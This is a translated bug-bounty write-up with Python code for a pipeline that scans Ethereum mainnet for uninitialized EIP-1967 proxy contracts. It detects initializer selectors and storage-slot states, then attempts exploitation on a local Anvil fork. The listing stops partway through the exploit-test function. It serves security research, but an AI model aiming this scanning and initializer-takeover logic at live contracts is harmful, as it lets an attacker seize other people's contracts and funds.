以太坊代理合约分析与漏洞利用管道的概念验证

该工具旨在检测以太坊主网上未初始化的代理合约,识别潜在的安全漏洞,特别是那些未正确初始化的可升级代理合约,这些漏洞可能导致未经授权的访问或操作。该工具包含合约收集、代理检测、初始化函数检测、存储槽分析和漏洞利用测试等多个组件,通过扫描链上合约、分析字节码模式和存储槽数据来发现未初始化的代理合约,并尝试利用这些合约。

以太坊代理合约分析和利用流程的 PoC

引言

此流程旨在检测、分析和测试以太坊主网上未初始化的代理合约。它侧重于识别可升级代理合约中潜在的安全漏洞,特别是那些尚未正确初始化的合约,这些漏洞可能导致未经授权的访问或操纵。


核心组件

1. 合约收集(collect 模式)

  • 扫描以太坊主网中新部署的合约
  • 使用 Infura RPC 进行区块链交互
  • 将合约地址存储在 SQLite 数据库中
  • 跟踪进度以支持可恢复扫描
  • 默认扫描范围:最近 10,000 个区块

2. 代理检测(detect-proxy 模式)

使用常见模式识别代理合约:

  • EIP-1167(最小代理)
  • EIP-1967(透明代理)-> 我现在专注于这一种
  • EIP-1822(通用可升级代理)

特性:

  • 字节码模式匹配
  • 实现地址检测
  • 存储槽分析 -> 主要检查代理合约和实现合约中的 slot0 和 slot1
  • Delegatecall 检测

3. 初始化函数检测(detect-signature 模式)

  • 扫描实现字节码中已知的初始化函数签名 -> 联系我获取函数签名列表!
  • 维护一个常见初始化函数模式的数据库
  • 识别潜在的初始化入口点
  • 存储检测到的签名以用于利用尝试

4. 存储槽分析(detect-slot-0 模式)

分析关键存储槽以确定初始化状态:

  • 代理合约槽 0 和 1
  • 实现合约槽 0 和 1
  • 槽模式的解释:
    • UNINITIALIZED(未初始化)
    • PARTIAL INIT(部分初始化)
    • NORMAL INIT(正常初始化)
    • OZ NORMAL INIT(OZ 正常初始化)
    • BOTH INITIALIZED(均已初始化)
    • MISCONF INITIALIZED(错误配置初始化)

5. 利用测试(exploit-test 模式)

使用以下方法测试未初始化的合约:

  • 主网的本地 Anvil 分叉
  • 多种初始化函数模式
  • 不同类型的参数编码:
    • address
    • uint64
    • uint256
    • string
    • bool
  • 存储变更验证
  • 交易模拟
  • Gas 使用分析

方法论

  1. 数据收集

    • 扫描区块以查找合约创建
    • 将地址存储在 SQLite 数据库中
    • 跟踪处理进度
  2. 代理分析

    • 检测字节码中的代理模式
    • 识别实现地址
    • 验证存储槽
  3. 漏洞检测

    • 检查初始化函数
    • 验证初始化状态
    • 分析存储模式
  4. 利用测试

    • 在本地分叉主网
    • 尝试初始化
    • 验证存储变更
    • 记录结果

用法

## 收集新合约
python pipeline.py --mode collect

## 检测代理合约
python pipeline.py --mode detect-proxy

## 检测初始化函数
python pipeline.py --mode detect-signature

## 分析存储槽
python pipeline.py --mode detect-slot-0

## 测试利用
python pipeline.py --mode exploit-test

数据库模式

此流程使用具有以下结构的 SQLite 数据库:

CREATE TABLE contracts (
    address TEXT PRIMARY KEY,
    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    is_proxy BOOLEAN DEFAULT FALSE,
    proxy_type TEXT,
    implementation_address TEXT,
    proxy_bytecode TEXT,
    implementation_bytecode TEXT,
    detectedfuncsignature TEXT,
    detectedtextsignature TEXT,
    slot0impl TEXT,
    slot1impl TEXT,
    slot0proxy TEXT,
    slot1proxy TEXT,
    slot_interpretation TEXT
)

未来改进思路

  1. 增强检测

    • 更多代理模式
    • 更多初始化函数签名
    • 改进的存储模式分析
  2. 自动化

    • 持续监控
    • 自动利用
    • 结果报告
  3. 分析工具

    • 更好的可视化
    • 统计分析
    • 风险评估

此流程仅用于安全研究和测试目的。在主网上测试任何合约之前,请务必确保你已获得适当的授权。



from config import INFURA_RPC_URL
from web3 import Web3
import sqlite3
from datetime import datetime
import time
import argparse
import requests # 保留现有导入,可能在其他地方或由用户使用
import json   # 保留现有导入
from pathlib import Path

def init_database():
    conn = sqlite3.connect('contracts.db')
    cursor = conn.cursor()
    # 使用代理信息创建合约表
    cursor.execute('''
        CREATE TABLE IF NOT EXISTS contracts (
            address TEXT PRIMARY KEY,
            created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
            is_proxy BOOLEAN DEFAULT FALSE,
            proxy_type TEXT,
            implementation_address TEXT,
            proxy_bytecode TEXT,
            implementation_bytecode TEXT,
            detectedfuncsignature TEXT,
            detectedtextsignature TEXT,
            slot0impl TEXT,
            slot1impl TEXT,
            slot0proxy TEXT,
            slot1proxy TEXT,
            slot_interpretation TEXT
        )
    ''')

    # 如果列不存在(对于现有数据库),则添加新列
    try:
        cursor.execute('ALTER TABLE contracts ADD COLUMN detectedfuncsignature TEXT')
    except sqlite3.OperationalError:
        pass  # 列已存在

    try:
        cursor.execute('ALTER TABLE contracts ADD COLUMN detectedtextsignature TEXT')
    except sqlite3.OperationalError:
        pass  # 列已存在

    try:
        cursor.execute('ALTER TABLE contracts ADD COLUMN slot0impl TEXT')
    except sqlite3.OperationalError:
        pass  # 列已存在

    try:
        cursor.execute('ALTER TABLE contracts ADD COLUMN slot1impl TEXT')
    except sqlite3.OperationalError:
        pass  # 列已存在

    try:
        cursor.execute('ALTER TABLE contracts ADD COLUMN slot0proxy TEXT')
    except sqlite3.OperationalError:
        pass  # 列已存在

    try:
        cursor.execute('ALTER TABLE contracts ADD COLUMN slot1proxy TEXT')
    except sqlite3.OperationalError:
        pass  # 列已存在

    try:
        cursor.execute('ALTER TABLE contracts ADD COLUMN slot_interpretation TEXT')
    except sqlite3.OperationalError:
        pass  # 列已存在

    # 创建进度跟踪表
    cursor.execute('''
        CREATE TABLE IF NOT EXISTS progress (
            id INTEGER PRIMARY KEY,
            last_processed_block INTEGER,
            updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
        )
    ''')
    conn.commit()
    return conn

def get_last_processed_block(cursor):
    cursor.execute('SELECT last_processed_block FROM progress ORDER BY id DESC LIMIT 1')
    result = cursor.fetchone()
    return result[0] if result else None

def update_last_processed_block(cursor, block_number):
    cursor.execute('INSERT INTO progress (last_processed_block) VALUES (?)', (block_number,))
    return block_number

def get_contract_addresses(start_block=None, batch_size=1000):
    # 使用 Infura 连接到以太坊网络
    w3 = Web3(Web3.HTTPProvider(INFURA_RPC_URL))

    # 初始化数据库连接
    conn = init_database()
    cursor = conn.cursor()

    # 获取最新的区块号
    latest_block = w3.eth.block_number

    # 从数据库获取上次处理的区块
    last_processed = get_last_processed_block(cursor)

    # 确定起始区块
    if start_block is None:
        if last_processed:
            start_block = last_processed + 1
        else:
            start_block = latest_block - 10000  # 如果没有先前的进度,则从最近 10000 个区块开始

    # 从指定范围的区块中获取合约地址
    contract_addresses = []
    total_blocks_processed = 0

    try:
        for block_num in range(start_block, latest_block + 1):
            try:
                block = w3.eth.get_block(block_num, full_transactions=True)

                # 检查区块中的每个交易
                for tx in block.transactions:
                    # 合约创建事务的“to”地址为 None
                    if tx['to'] is None:
                        try:
                            receipt = w3.eth.get_transaction_receipt(tx['hash'])
                            if receipt['contractAddress']:
                                contract_address = receipt['contractAddress']
                                # 存储在数据库中
                                try:
                                    cursor.execute(
                                        'INSERT OR IGNORE INTO contracts (address) VALUES (?)',
                                        (contract_address,)
                                    )
                                    if cursor.rowcount > 0:  # 如果实际插入了新合约
                                        print(f"发现并存储了新合约:{contract_address}(区块:{block_num})")
                                        contract_addresses.append(contract_address)
                                except sqlite3.Error as e:
                                    print(f"地址 {contract_address} 的数据库错误:{str(e)}")
                        except Exception as e:
                            print(f"获取 tx {tx['hash'].hex()} 的收据时出错:{str(e)}")

                total_blocks_processed += 1

                # 每 batch_size 个区块更新进度
                if total_blocks_processed % batch_size == 0:
                    conn.commit()
                    update_last_processed_block(cursor, block_num)
                    print(f"\n已处理 {block_num - batch_size + 1} 到 {block_num} 个区块。发现了 {len(contract_addresses)} 个新合约。")
                    # 少量延迟以避免速率限制
                    time.sleep(0.1)

            except Exception as e:
                print(f"处理区块 {block_num} 时出错:{str(e)}")
                continue

    finally:
        # 更新最终进度并关闭连接
        if total_blocks_processed > 0:
            update_last_processed_block(cursor, block_num)
        conn.commit()
        conn.close()

    return contract_addresses, total_blocks_processed

def detect_proxy(addr):
    w3 = Web3(Web3.HTTPProvider(INFURA_RPC_URL))
    code = w3.eth.get_code(addr).hex()

    # 使用默认值初始化分析结果
    analysis = {
        'address': addr,
        'is_proxy': False,
        'proxy_type': None,
        'code_size': 0,
        'has_delegatecall': False,
        'has_storage_slot': False,
        'has_implementation_slot': False,
        'has_admin_slot': False,
        'implementation_address': None,
        'proxy_bytecode': code,
        'implementation_bytecode': None
    }

    if not code or code == '0x':
        analysis['status'] = 'EOA 或自毁'
        return analysis

    # 常见代理模式签名
    proxy_patterns = {
        'EIP-1167': '363d3d373d3d3d363d73',  # 最小代理
        'EIP-1967': '360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc',  # 透明代理
        'EIP-1822': 'a3f0ad74e5423aebfd80d3ef4346578335a9a72aeaee59ff6cb3582b35133d50',  # 通用可升级代理
    }

    # 实现地址的存储槽
    implementation_slots = {
        'EIP-1967': '0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc',
        'EIP-1822': '0xa3f0ad74e5423aebfd80d3ef4346578335a9a72aeaee59ff6cb3582b35133d50'
    }

    # 使用代码大小更新分析
    analysis['code_size'] = len(code) // 2

    # 检查每个代理模式
    for pattern_name, signature in proxy_patterns.items():
        if signature in code.lower():
            analysis['is_proxy'] = True
            analysis['proxy_type'] = pattern_name

            # 获取可升级代理的实现地址
            if pattern_name in implementation_slots:
                try:
                    slot = implementation_slots[pattern_name]
                    impl_address_raw = w3.eth.get_storage_at(addr, slot)
                    if impl_address_raw != b'\x00' * 32:  # 检查槽是否为空
                        # 转换为校验和地址
                        raw_address_hex = '0x' + impl_address_raw.hex()[-40:]
                        analysis['implementation_address'] = Web3.to_checksum_address(raw_address_hex)
                        # 获取实现字节码
                        impl_code = w3.eth.get_code(analysis['implementation_address']).hex()
                        analysis['implementation_bytecode'] = impl_code
                except Exception as e:
                    print(f"获取 {addr} 的实现地址时出错:{str(e)}")
            break

    # 代理特征的其他检查
    analysis.update({
        'has_delegatecall': 'f4' in code.lower(),  # DELEGATECALL 操作码
        'has_storage_slot': '54' in code.lower(),  # SLOAD 操作码(在代理中很常见)
        'has_implementation_slot': '360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc' in code.lower(),  # EIP-1967 实现槽
        'has_admin_slot': 'b53127684a568b3173ae13b9f8a6016e243e63b6e8ee1178d6a717850b5d6103' in code.lower(),  # EIP-1967 管理员槽
    })

    # 如果检测到代理,则更新数据库
    if analysis['is_proxy']:
        conn_db = sqlite3.connect('contracts.db')
        cursor_db = conn_db.cursor()
        try:
            cursor_db.execute('''
                UPDATE contracts 
                SET is_proxy = TRUE, 
                    proxy_type = ?,
                    implementation_address = ?,
                    proxy_bytecode = ?,
                    implementation_bytecode = ?
                WHERE address = ?
            ''', (
                analysis['proxy_type'], 
                analysis['implementation_address'],
                analysis['proxy_bytecode'],
                analysis['implementation_bytecode'],
                addr
            ))
            conn_db.commit()
            print("\n=== 检测到代理 ===")
            print(f"代理地址:{addr}")
            if analysis['implementation_address']:
                print(f"实现:{analysis['implementation_address']}")
            print(f"模式:{analysis['proxy_type']}")
            print("已在数据库中更新")
            print("===================\n")
        except sqlite3.Error as e:
            print(f"更新 {addr} 的代理信息时出错:{str(e)}")
        finally:
            conn_db.close()

    return analysis

def load_signatures_from_file(file_path):
    signatures = {}
    try:
        with open(file_path, 'r') as f:
            for line in f:
                line = line.strip()
                if ':' in line:
                    text_sig, hex_sig = line.split(':', 1)
                    signatures[text_sig] = hex_sig.lower().replace('0x', '')
        print(f"从 {file_path} 加载了 {len(signatures)} 个签名")
    except FileNotFoundError:
        print(f"错误:在 {file_path} 找不到签名文件。请先运行 'utils/collect_signatures.py'。")
    except Exception as e:
        print(f"读取签名文件 {file_path} 时出错:{e}")
    return signatures

def detect_uninitialized_contract():
    conn = sqlite3.connect('contracts.db')
    cursor = conn.cursor()

    cursor.execute('''
        SELECT address, implementation_address, implementation_bytecode
        FROM contracts 
        WHERE proxy_type = 'EIP-1967' AND implementation_bytecode IS NOT NULL
    ''')

    proxies = cursor.fetchall()

    print(f"\n=== 分析具有实现字节码的 {len(proxies)} 个 EIP-1967 代理合约 ===")

    signatures_file_path = Path(__file__).parent / 'utils' / 'initialize_signatures.txt'
    init_signatures = load_signatures_from_file(signatures_file_path)

    if not init_signatures:
        print("未加载初始化签名。无法继续检测。")
        print("请确保 'utils/initialize_signatures.txt' 存在并已填充。")
        print("你可以通过运行 'python utils/collect_signatures.py' 来生成它。")
        print("===============================\n")
        conn.close()
        return

    found_count = 0
    for proxy_address, impl_address, impl_bytecode in proxies:
        if not impl_bytecode: # 应该由 SQL 处理,但作为一种保护措施
            continue

        impl_bytecode_clean = impl_bytecode.lower().replace('0x', '')

        for text_signature, hex_signature in init_signatures.items():
            if hex_signature in impl_bytecode_clean:
                print(f"\n代理地址:{proxy_address}")
                print(f"实现地址:{impl_address}")
                print(f"文本签名:{text_signature}")
                print(f"十六进制签名:{hex_signature}")

                # 将检测到的签名存储在数据库中
                try:
                    cursor.execute('''
                        UPDATE contracts 
                        SET detectedfuncsignature = ?, detectedtextsignature = ?
                        WHERE address = ?
                    ''', (hex_signature, text_signature, proxy_address))
                    conn.commit()
                    print(f"已将签名存储在代理 {proxy_address} 的数据库中")
                except sqlite3.Error as e:
                    print(f"存储 {proxy_address} 的签名时发生数据库错误:{str(e)}")

                found_count += 1
                break 

    if found_count == 0:
        print("\n在其实现字节码中未找到具有已知初始化函数签名的合约。")
    else:
        print(f"\n发现了 {found_count} 个具有已知初始化函数签名的实现合约。")
        print(f"已将签名数据存储在数据库中,适用于 {found_count} 个代理合约。")
    print("===============================\n")

    conn.close()

def analyze_stored_contracts():
    conn = sqlite3.connect('contracts.db')
    cursor = conn.cursor()
    cursor.execute("SELECT COUNT(*) FROM contracts")
    total_contracts = cursor.fetchone()[0]
    print(f"数据库中的合约总数:{total_contracts}")

    print("\n正在分析合约以查找代理模式...")
    cursor.execute("SELECT address FROM contracts")
    addresses_to_analyze = cursor.fetchall()

    proxy_count = 0
    for addr_tuple in addresses_to_analyze:
        analysis_result = detect_proxy(addr_tuple[0])
        if analysis_result['is_proxy']:
            proxy_count += 1

    print(f"\n在 {total_contracts} 个合约中找到了 {proxy_count} 个代理合约")
    conn.close()

def interpret_slot_data(proxy_slot_0, proxy_slot_1, impl_slot_0, impl_slot_1):
    """
    解释槽数据以确定初始化状态和潜在问题。

    参数:
        proxy_slot_0:代理合约槽 0 十六进制数据
        proxy_slot_1:代理合约槽 1 十六进制数据
        impl_slot_0:实现合约槽 0 十六进制数据
        impl_slot_1:实现合约槽 1 十六进制数据

    返回值:
        槽数据分析的字符串解释
    """
    # 检查槽是否为空(全部为零)- 没有 0x 前缀,因为 get_storage_at 返回没有 0x 的十六进制值
    empty_slot = "00" * 32

    proxy_slot_0_empty = proxy_slot_0 == empty_slot
    proxy_slot_1_empty = proxy_slot_1 == empty_slot
    impl_slot_0_empty = impl_slot_0 == empty_slot
    impl_slot_1_empty = impl_slot_1 == empty_slot

    # 情况 1:所有槽都为 0 = 未初始化
    if proxy_slot_0_empty and proxy_slot_1_empty and impl_slot_0_empty and impl_slot_1_empty:
        return "UNINITIALIZED"

    # 情况 2:代理槽 1 不为空但所有其他槽都为空 = 部分初始化
    if not proxy_slot_1_empty and proxy_slot_0_empty and impl_slot_0_empty and impl_slot_1_empty:
        return "partial init"

    # 情况 3:代理槽 0 和代理槽 1 都不为空 = 已初始化
    if not proxy_slot_0_empty and not proxy_slot_1_empty:
        return "initialize"

    # 情况 4:代理槽 0 以 "1" 结尾,实现槽 0 以 "ff" 结尾 = OZ 正常初始化
    if proxy_slot_0.endswith("1") and impl_slot_0.endswith("ff"):
        return "OZ normal init"

    # 情况 5:代理槽 0 等于实现槽 0(两个非零地址)= 均已初始化
    if not proxy_slot_0_empty and not impl_slot_0_empty and proxy_slot_0 == impl_slot_0:
        return "BOTH initialized"

    # 情况 6:实现槽 0 不为空但代理槽 0 为空 = 错误配置
    if not impl_slot_0_empty and proxy_slot_0_empty:
        return "MISCONF initialized via implementation"

    # 所有其他情况 = 未知
    return "Unknown"

def detect_slot_0():
    """
    检索和存储来自实现合约和代理合约的槽 0 和槽 1 数据。
    """
    w3 = Web3(Web3.HTTPProvider(INFURA_RPC_URL))
    conn = sqlite3.connect('contracts.db')
    cursor = conn.cursor()

    # 获取所有具有检测到的初始化签名的代理合约
    cursor.execute('''
        SELECT address, implementation_address, detectedfuncsignature, detectedtextsignature
        FROM contracts 
        WHERE implementation_address IS NOT NULL 
        AND detectedfuncsignature IS NOT NULL
        ORDER BY implementation_address, address
    ''')

    proxy_contracts = cursor.fetchall()

    print(f"\n=== 正在检索 {len(proxy_contracts)} 个代理合约的槽数据 ===")

    if not proxy_contracts:
        print("未找到具有检测到的初始化签名的代理合约。")
        print("===============================\n")
        conn.close()
        return

    success_count = 0
    error_count = 0
    processed_implementations = set()

    for proxy_address, impl_address, hex_sig, text_sig in proxy_contracts:
        try:
            print(f"\n代理地址:{proxy_address}")
            print(f"实现:{impl_address}")
            print(f"检测到的签名:{text_sig} ({hex_sig})")

            # 从代理合约获取槽 0 和槽 1 数据
            proxy_slot_0 = w3.eth.get_storage_at(proxy_address, 0)
            proxy_slot_0_hex = proxy_slot_0.hex()

            proxy_slot_1 = w3.eth.get_storage_at(proxy_address, 1)
            proxy_slot_1_hex = proxy_slot_1.hex()

            print(f"代理槽 0:{proxy_slot_0_hex}")
            print(f"代理槽 1:{proxy_slot_1_hex}")

            # 从实现合约获取槽 0 和槽 1 数据(每个实现仅一次)
            if impl_address not in processed_implementations:
                impl_slot_0 = w3.eth.get_storage_at(impl_address, 0)
                impl_slot_0_hex = impl_slot_0.hex()

                impl_slot_1 = w3.eth.get_storage_at(impl_address, 1)
                impl_slot_1_hex = impl_slot_1.hex()

                print(f"实现槽 0:{impl_slot_0_hex}")
                print(f"实现槽 1:{impl_slot_1_hex}")

                processed_implementations.add(impl_address)
            else:
                # 从数据库获取现有的实现槽数据
                cursor.execute('SELECT slot0impl, slot1impl FROM contracts WHERE implementation_address = ? AND slot0impl IS NOT NULL LIMIT 1', (impl_address,))
                result = cursor.fetchone()
                if result:
                    impl_slot_0_hex, impl_slot_1_hex = result
                    print(f"实现槽 0:{impl_slot_0_hex}(已缓存)")
                    print(f"实现槽 1:{impl_slot_1_hex}(已缓存)")
                else:
                    # 回退:从区块链检索
                    impl_slot_0 = w3.eth.get_storage_at(impl_address, 0)
                    impl_slot_0_hex = impl_slot_0.hex()

                    impl_slot_1 = w3.eth.get_storage_at(impl_address, 1)
                    impl_slot_1_hex = impl_slot_1.hex()

                    print(f"实现槽 0:{impl_slot_0_hex}")
                    print(f"实现槽 1:{impl_slot_1_hex}")

            # 解释槽数据
            interpretation = interpret_slot_data(proxy_slot_0_hex, proxy_slot_1_hex, impl_slot_0_hex, impl_slot_1_hex)
            print(f"解释:{interpretation}")

            # 将结果存储在数据库中
            cursor.execute('''
                UPDATE contracts 
                SET slot0impl = ?, slot1impl = ?, slot0proxy = ?, slot1proxy = ?, slot_interpretation = ?
                WHERE address = ?
            ''', (impl_slot_0_hex, impl_slot_1_hex, proxy_slot_0_hex, proxy_slot_1_hex, interpretation, proxy_address))

            success_count += 1

        except Exception as e:
            print(f"检索代理 {proxy_address} 的槽数据时出错:{str(e)}")
            error_count += 1
            continue

    # 提交所有更新
    conn.commit()
    conn.close()

    print(f"\n=== 概要 ===")
    print(f"代理合约总数:{len(proxy_contracts)}")
    print(f"成功检索:{success_count}")
    print(f"错误:{error_count}")
    print("===============================\n")

def exploit_test():
    """
    测试与 Anvil 分叉主网的连接,验证未初始化的代理合约,并尝试利用。
    """
    # 连接到 Anvil(默认端口 8545)
    anvil_url = "http://localhost:8545"
    w3 = Web3(Web3.HTTPProvider(anvil_url))

    # 检查连接
    try:
        latest_block = w3.eth.block_number
        print(f"✓ 已连接到 Anvil 分叉主网。最新区块:{latest_block}")
    except Exception as e:
        print(f"✗ 连接到 Anvil 时出错:{e}")
        print("确保 Anvil 正在运行,命令为:anvil --fork-url <YOUR_RPC_URL>")
        return

    # 显示帐户信息
    try:
        accounts = w3.eth.accounts
        if accounts:
            default_account = accounts[0]
            balance = w3.eth.get_balance(default_account)
            balance_eth = w3.from_wei(balance, 'ether')
            print(f"✓ 使用帐户:{default_account}")
            print(f"✓ 帐户余额:{balance_eth} ETH")
        else:
            print("✗ 没有可用帐户")
            return
    except Exception as e:
        print(f"✗ 获取帐户信息时出错:{e}")
        return

    # 从数据库获取未初始化的代理合约
    conn = sqlite3.connect('contracts.db')
    cursor = conn.cursor()

    cursor.execute('''
        SELECT address, implementation_address, detectedtextsignature, detectedfuncsignature, slot0proxy, slot1proxy
        FROM contracts 
        WHERE slot_interpretation = 'UNINITIALIZED' 
        AND implementation_address IS NOT NULL
        ORDER BY address
    ''')

    uninitialized_contracts = cursor.fetchall()
    conn.close()

    print(f"\n=== 验证和利用未初始化的代理合约 ===")

    if not uninitialized_contracts:
        print("在数据库中未找到未初始化的代理合约。")
        print("首先运行 --mode detect-slot-0 以分析初始化状态。")
        return

    print(f"找到 {len(uninitialized_contracts)} 个未初始化的代理合约:\n")

    verified_count = 0
    exploited_count = 0
    error_count = 0

    for i, (proxy_address, impl_address, text_sig, hex_sig, slot0_proxy, slot1_proxy) in enumerate(uninitialized_contracts, 1):
        print(f"{i}. 代理地址:{proxy_address}")
        print(f"   实现:{impl_address}")
        print(f"   初始化函数:{text_sig}")
        print(f"   函数选择器:0x{hex_sig}")

        try:
            # 从区块链读取当前槽值
            proxy_slot_0_before = w3.eth.get_storage_at(proxy_address, 0)
            proxy_slot_1_before = w3.eth.get_storage_at(proxy_address, 1)
            impl_slot_0_before = w3.eth.get_storage_at(impl_address, 0)
            impl_slot_1_before = w3.eth.get_storage_at(impl_address, 1)

            # 转换为十六进制字符串以进行比较
            proxy_slot_0_hex = proxy_slot_0_before.hex()
            proxy_slot_1_hex = proxy_slot_1_before.hex()
            impl_slot_0_hex = impl_slot_0_before.hex()
            impl_slot_1_hex = impl_slot_1_before.hex()

            print(f"   当前代理槽 0:{proxy_slot_0_hex}")
            print(f"   当前代理槽 1:{proxy_slot_1_hex}")
            print(f"   当前实现槽 0: {impl_slot_0_hex}")
            print(f"   当前实现槽 1: {impl_slot_1_hex}")

            # 验证所有槽是否为零
            proxy_slot_0_zero = proxy_slot_0_hex == "00" * 32
            proxy_slot_1_zero = proxy_slot_1_hex == "00" * 32
            impl_slot_0_zero = impl_slot_0_hex == "00" * 32
            impl_slot_1_zero = impl_slot_1_hex == "00" * 32

            all_slots_zero = proxy_slot_0_zero and proxy_slot_1_zero and impl_slot_0_zero and impl_slot_1_zero

            if all_slots_zero:
                print(f"   ✓ 已验证:所有槽都为零 - 合约未初始化")
                verified_count += 1

                # 尝试利用
                print(f"   正在尝试利用...")

                # 基于函数签名准备交易数据
                function_data = f"0x{hex_sig}"

                # 根据签名添加虚拟参数
                if "uint64" in text_sig:
                    # 添加虚拟 uint64 参数(值:1)
                    function_data += "0000000000000000000000000000000000000000000000000000000000000001

>- 原文链接: [github.com/Thomas-EDET/B...](https://github.com/Thomas-EDET/BugBountyWeb3/blob/main/Web3/EIP1967%20pipeline%20PoC.md)
>- 登链社区 AI 助手,为大家转译优秀英文文章,如有翻译不通的地方,还请包涵~
点赞 0
收藏 0
分享
本文参与登链社区写作激励计划 ,好文好收益,欢迎正在阅读的你也加入。

0 条评论

请先 登录 后评论
Thomas-EDET
Thomas-EDET
江湖只有他的大名,没有他的介绍。